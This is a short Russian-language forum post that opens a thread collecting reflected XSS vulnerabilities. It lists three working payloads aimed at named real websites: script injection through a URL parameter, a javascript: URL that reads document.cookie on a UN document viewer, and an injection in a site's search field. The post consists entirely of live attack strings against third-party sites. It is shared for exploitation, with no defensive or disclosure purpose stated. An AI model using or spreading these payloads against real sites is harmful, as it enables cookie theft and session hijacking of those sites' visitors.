Выкладываем только пассивные XSS . Я начну :
http://mi.zaua.com/?rl=%22%3E%3Cscript%3Ealert(/Fuck%20off/)%3C/script%3E
http://www.un.org/zh/documents/view_doc.asp?url=javascript:alert(document.cookie)
http://www.dokoran.cz --> поле Hledani : "><script>alert('xss')</script>...